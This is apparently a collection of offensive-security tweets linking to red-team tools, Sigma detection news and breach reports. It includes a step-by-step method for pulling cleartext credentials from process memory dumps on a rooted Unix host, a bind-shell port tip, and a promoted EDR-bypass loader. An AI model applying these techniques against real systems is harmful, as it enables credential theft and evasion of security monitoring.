Interesting read: Exploiting many AV's via a race condition rack911labs.com/research/explo…

Sysinternals Update April 2020 youtu.be/_MUP4tgdM7s via YouTube

It's here! Zeek log support for the SIGMA Project! Check it out over SOC Prime's uncoder.io. Also, PR for opensource w/ more details than a tweet: github.com/Neo23x0/sigma/…. There will be an introduction and rules in just a few hrs during Roberto Rodriguez 🇵🇪's hackathon

Excited to see that Sigma now supports ee-outliers as backend! Start tagging & dashboarding your Sigma hits in Elasticsearch today!🥳 Blog post: blog.nviso.eu/2020/05/14/sig… Thanks for all the work you do Florian Roth ⚡️ Thomas Patzke! #sigma #siem #soc #elk

#PROTIP: If you can't listen on port 80 during a bind shell, try adding the URI '/Temporary_Listen_Address/' to ur listener. Magic! You don't need administrative privileges to listen on port 80 on Windows anymore #redteam #windows

This is a weird and fun little bug found by @julianpentest Cmd Hijack - a command/argument confusion with path traversal in cmd.exe hackingiscool.pl/cmdhijack-comm…

Have a root shell on a *nix system? Need to move laterally? 1) Find processes where people might be logged in. (ps -A) 2) gcore $PID 3) strings core.$PID 4) Read credentials in clear text. NOTE: Some modern OSes protect this. Also, encrypted memory will NOT stop this attack.

the Twitter hacker reportedly got access to Twitter’s admin panel by finding login credentials pinned inside a Twitter Slack channel. If that’s true then holy shit. nytimes.com/2020/07/17/tec…

Twitter w/ more info on hack. A "small #" of employees "manipulated." 130 accounts targeted, succeeded in tweeting from 45 of them & may have been able to view additional info (read: DMs). On 8 accounts, d/l'd account history using Your Twitter Data tool. blog.twitter.com/en_us/topics/c…

Metasploit 6 Now Under Active Development blog.rapid7.com/2020/08/06/met…

Here it is - PoshC2 v7.0. Better comms, payload generation, EDR detection, Docker support and MUCH more. Thanks to Ben Turner 🇬🇧 məˈklaʊd @m0rv4i & many others! labs.nettitude.com/blog/introduci…

A very useful command. This turns Powershell's auto-complete into Linux type autocomplete. Set-PSReadlineKeyHandler -Key Tab -Function Complete

I've spent a few days writing up #ZeroLogon from both a #RedTeam and #BlueTeam perspective to help me expand my #PurpleTeam knowledge, it is very much a sit down and read post blog.zsec.uk/zerologon-atta…

Have you checked out our deep dive into Cobalt Strike detection? If not, you're missing out on new Snort and ClamAV rules, and a complete dissection of the tool threat actors are using more every day cs.co/6018GxWiw

I just wrote a small blogpost on implementing direct syscalls in the #cobaltstrike artifact kit. Using the excellent syswhispers tool by Jackson T. . Writeup at br-sn.github.io/Implementing-S… #redteam

My recent contribution to Process Hacker: PH now has "Image Coherency" checks to highlight Herpaderped, Doppelganged, or Hollowed processes. github.com/processhacker/…

An alternative of CS execute-assembly, built with C/C++ and can be used to Load/Inject .NET assemblies &; * Stomping PE DOS headers. * Unlinking .NET (CLR ..etc) modules from PEB. * Static syscalls for bypassing EDR Hooks. more... bit.ly/3rgBlJt d.pr/free/i/USrbQg

🚨 Open to work — AI Security/ red team / adversary sim 8+ yrs in offensive sec, ex-Cobalt Strike, SANS instructor (12 w/y) Looking for flexible, senior/principal roles w/ impact > hours DMs open or connect via: linkedin.com/in/jean-franco…